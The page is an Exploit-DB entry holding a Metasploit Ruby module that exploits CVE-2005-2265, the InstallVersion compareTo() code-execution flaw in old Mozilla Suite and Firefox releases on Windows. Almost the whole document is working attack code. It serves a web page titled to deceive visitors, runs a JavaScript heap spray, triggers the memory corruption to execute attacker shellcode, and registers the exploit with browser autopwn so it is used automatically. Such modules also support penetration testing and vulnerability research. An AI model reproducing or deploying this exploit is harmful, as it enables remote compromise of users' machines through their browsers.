Mozilla Suite/Firefox – InstallVersion->compareTo() Code Execution (Metasploit)

  • 作者: Metasploit
    日期: 2010-09-20
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/16306/
  • ##
    # $Id: mozilla_compareto.rb 10394 2010-09-20 08:06:27Z jduck $
    ##
    
    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##
    
    require 'msf/core'
    
    class Metasploit3 < Msf::Exploit::Remote
    	Rank = NormalRanking
    
    	#
    	# This module acts as an HTTP server
    	#
    	include Msf::Exploit::Remote::HttpServer::HTML
    
    	include Msf::Exploit::Remote::BrowserAutopwn
    	# The version for this vuln is tricky because it affects mozilla 1.7-1.7.10
    	# and firefox 1.0-1.0.4, so we set minver and maxver to the outer bounds.
    	autopwn_info({
    		:ua_name => HttpClients::FF,
    		:ua_minver => "1.0",
    		:ua_maxver => "1.7.10",
    		:os_name => OperatingSystems::WINDOWS,
    		:javascript => true,
    		:rank => NormalRanking, # reliable memory corruption
    		:vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }",
    	})
    
    	def initialize(info = {})
    		super(update_info(info,
    			'Name' => 'Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution',
    			'Description'=> %q{
    					This module exploits a code execution vulnerability in the Mozilla
    				Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit
    				module is a direct port of Aviv Raff's HTML PoC.
    			},
    			'License'=> MSF_LICENSE,
    			'Author' =>['hdm', 'Aviv Raff <avivra [at] gmail.com>'],
    			'Version'=> '$Revision: 10394 $',
    			'References' =>
    				[
    					['CVE','2005-2265'],
    					['OSVDB','17968'],
    					['BID','14242'],
    					['URL','http://www.mozilla.org/security/announce/mfsa2005-50.html'],
    				],
    			'Payload'=>
    				{
    					'Space'=> 400,
    					'BadChars' => "\x00",
    				},
    			'Targets'=>
    				[
    					# Tested against Firefox 1.0.4 and Mozilla 1.7.1 on
    					# WinXP-SP3 and Win2kAS-SP0
    					[ 'Firefox < 1.0.5, Mozilla < 1.7.10, Windows',
    						{
    							'Platform' => 'win',
    							'Arch' => ARCH_X86,
    							'Ret' => 0x0c0c0c0c,
    						}
    					],
    				],
    			'DefaultTarget'=> 0,
    			'DisclosureDate' => 'Jul 13 2005'
    			))
    	end
    
    	def on_request_uri(cli, request)
    
    		# Re-generate the payload
    		return if ((p = regenerate_payload(cli)) == nil)
    
    		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
    		send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
    
    		# Handle the payload
    		handler(cli)
    	end
    
    	def generate_html(payload)
    
    		enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
    		enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))
    
    		spray_to = sprintf("0x%.8x", target.ret)
    		spray_slide1 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) )
    		spray_slide2 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) )
    		eax_address = sprintf("0x%.8x", target.ret)
    
    		return %Q|
    <html>
    <head>
    <!--
    	Copyright (C) 2005-2006 Aviv Raff (with minor modifications by HDM for the MSF module)
    	From: http://aviv.raffon.net/2005/12/11/MozillaUnderestimateVulnerabilityYetAgainPlusOldVulnerabilityNewExploit.aspx
    	Greets: SkyLined, The Insider and shutdown
    -->
    	<title>One second please...</title>
    	<script language="javascript">
    
    		function BodyOnLoad()
    		{
    			location.href="javascript:void (new InstallVersion());";
    			CrashAndBurn();
    		};
    
    		#{js_heap_spray}
    		// The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology
    		function CrashAndBurn()
    		{
    			// Payload - Just return..
    			var payLoadCode=unescape("#{enc_code}");
    
    			// Size of the heap blocks
    			var heapBlockSize=0x400000;
    			sprayHeap(payLoadCode, #{target.ret}, heapBlockSize - (payLoadCode.length + 0x38));
    
    			// Set address to fake "pdata".
    			var eaxAddress = #{eax_address};
    
    			//	This was taken from shutdown's PoC in bugzilla
    			// struct vtbl { void (*code)(void); };
    			// struct data { struct vtbl *pvtbl; };
    			//
    			// struct data *pdata = (struct data *)(xxAddress & ~0x01);
    			// pdata->pvtbl->code(pdata);
    			//
    			(new InstallVersion).compareTo(new Number(eaxAddress >> 1));
    		}
    // -->
    	</script>
    </head>
    <body onload="BodyOnLoad()">
    </body>
    </html>
    		|
    	end
    
    end